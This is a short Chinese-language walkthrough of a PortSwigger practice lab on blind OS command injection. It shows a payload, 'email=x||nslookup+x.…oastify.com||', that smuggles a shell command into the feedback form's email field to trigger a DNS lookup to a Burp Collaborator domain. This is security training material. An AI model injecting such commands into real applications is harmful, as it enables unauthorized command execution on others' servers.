bp官方靶场OS command injection（操作系统命令注入）漏洞4

第四关 带外交互的盲注操作系统命令注入

---

这一关就是利用Burp Collaborator 子域，实现带外交互，触发dns查找

提示：1、在反馈函数中包含一个盲注系统命令注入漏洞

2、应用程序执行包含用户提供的详细信息的 shell 命令。该命令是异步执行的，对应用程序的响应没有影响。无法将输出重定向到您可以访问的位置。但是，您可以触发与外部域的带外交互。

3、利用盲注系统命令注入漏洞向 Burp Collaborator 发出 DNS 查找

具体操作：

1、反馈内容随便写一下，然后提交，触发相关功能数据包（操作见第三关）

2、在发送邮件地址的位置，插入burp的子域，触发与外部域的带外交互

复制下子域：

bdsp1iqx0r6fvtxc2dje67p1jspjdb10.oastify.com

利用盲注系统命令注入漏洞向 Burp Collaborator 发出 DNS 查找

修改邮件后面的参数：

email=x||nslookup+x.bdsp1iqx0r6fvtxc2dje67p1jspjdb10.oastify.com||
​
Burp Collaborator 子域：bdsp1iqx0r6fvtxc2dje67p1jspjdb10.oastify.com

3、发送了数据包并且响应后，我们去burp看下有回显没，触发与外部域的带外交互

4、回到页面刷新，如图靶场过关